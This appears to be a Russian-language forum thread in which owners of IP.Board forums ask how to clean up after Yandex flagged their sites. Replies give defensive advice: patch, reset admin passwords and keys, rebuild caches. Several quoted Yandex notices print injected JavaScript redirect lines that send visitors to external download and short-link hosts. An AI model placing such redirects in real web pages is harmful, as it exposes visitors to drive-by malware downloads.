Перейти к содержимому
Русский язык для Invision Community 5

Яндекс обнаружил вредоносный код на форуме

Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

Рекомендованные сообщения

они для 3.1.х, 3.2.х и 3.4.х, а у меня 3.4.х

Где вы там уведели прошлогодний патч для 3.1x? Поддержка этой версии закончилась три года назад.

http://ipbskins.ru/forum/topic13571.html#entry89862 (патч от 9 Ноября 2014) и все последующие патчи.

 

Так а как найти вирус?

Какой вирус?

В отчете айболита ничего подозрительного нету.

Странно, Яндекс.Вебмастер об угрозах молчит

Странно было если бы форум был заражен а яндекс молчал. В противном случае скорее всего форум чист. Возможно не успели или не смогли расшифровать хеш пароля, либо при входе в АЦ стоит дополнительная авторизация, а без доступа в админцентр встроить вредоносный код намного сложнее.

В отчете айболита ничего подозрительного нету.

 

Так значит беспокоится не о чем. А как же sql_latest_error.cgi? Просто поставить патч и всё?

А как же sql_latest_error.cgi? Просто поставить патч и всё?

Ошибка в sql логе говорит о том, что на форуме проводилась sql инъекция которая позволяет получить произвольный доступ к данным форума, к таким как ключ авторизации, хеш пароля и прочим. Имея эти данные злоумышленник, расшифровав хеш, может авторизоваться на форуме под любой учетной записью имеющей доступ в АЦ. Отсюда надеюсь понятно, что одними патчами уже нельзя обойтись. Следует также сменить все пароли администраторов (с обязательным сбросом ключа авторизации), чьи хеши скомпрометированы и которыми злоумышленник может воспользоваться. Получить конфиденциальные данные это тоже считается взломом, не только дефейс или инфицирование сайта.

  • 1 месяц спустя...

Здравствуйте! Перечитал всю тему. Просканировал манулом, но вредоносного кода не обнаружил, при этом ТП яндекс прислал письмо

"К сожалению, на Вашем сайте повторно появился указанный ниже вредоносный код:

 

document.location='http://url4short.info/c64bad21'

 

при подгрузке следующего url:

 

autopaty.com.ua/index.php?ipbv=9fea7de314a3082c69f1615e16d6b1c8&g=js

 

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код."

Не знаю каким образом вы перечитали всю тему, потому что лечение от этого вируса обсуждалось здесь стопиццот раз прямо со второго сообщения. Я не услышал ни одного конкретного пункта который вы должно были проделать, а для эффективного лечения их нужно выполнить все. Попробуйте еще раз перечитать тему, и на этот раз вникать в суть написанного. Не получается - обращайтесь к услугам специалистов, мы всегда будем рады вам помочь.

  • 2 недели спустя...

Быстро просканировав сайт скриптом от siv1987

 

Получил такой результат:

 

От яндекса получил такое письмо:

На Вашем сайте периодически появляется указанный ниже вредоносный код: document.location='http://url4short.info/62decc30' при подгрузке следующего url: nlc-zone.ru/forum/public/min/index.php?ipbv=b7af755633926f5a00313de81c8c7342&g=js

 

1. Кеш стилей и языков обновил

2. пароли сменил

3. отключил сжатие JS / CSS

 

Окромя того что нашел scan.php нигде ничего нет :(

Быстро просканировав сайт скриптом от siv1987

Этот скрипт не предназначен для поиска вирусов и лишь служит для быстрого поиска некоторых функций используемых в бэкдорах. Для поиска вирусов используйте специализированые скрипты и по.

 

 

Окромя того что нашел scan.php нигде ничего нет

Если вы проделали все пункты - дайте на перепроверку и ждите результат.

Сжатие css не имеет никакого отношения, не знаю откуда вы это взяли, а вот обновления безопасности ставить нужно, иначе все остальное будет бесполезно.

  • 1 месяц спустя...

Все решилось перестроением кешей стилей, сменой паролей и переименовыванием папки admin.

Создайте аккаунт или войдите в него для комментирования

Важная информация

При использовании данного сайта, вы согласаетесь с Условия использования и Чтобы сделать этот веб-сайт лучше, мы разместили cookies на вашем устройстве. Вы можете изменить свои настройки cookies, в противном случае мы будем считать, что вы согласны с этим..

Аккаунт

Навигация

Поиск

Поиск

Настроить push-уведомления браузера

Chrome (Android)
  1. Нажмите на иконку замка рядом с адресной строкой.
  2. Нажмите Права доступа -> Уведомления.
  3. Измените свои настройки.
Chrome (компьютер)
  1. Нажмите на иконку замка в адресной строке.
  2. Выберите Настройки сайта.
  3. Найдите Уведомления и измените свои настройки.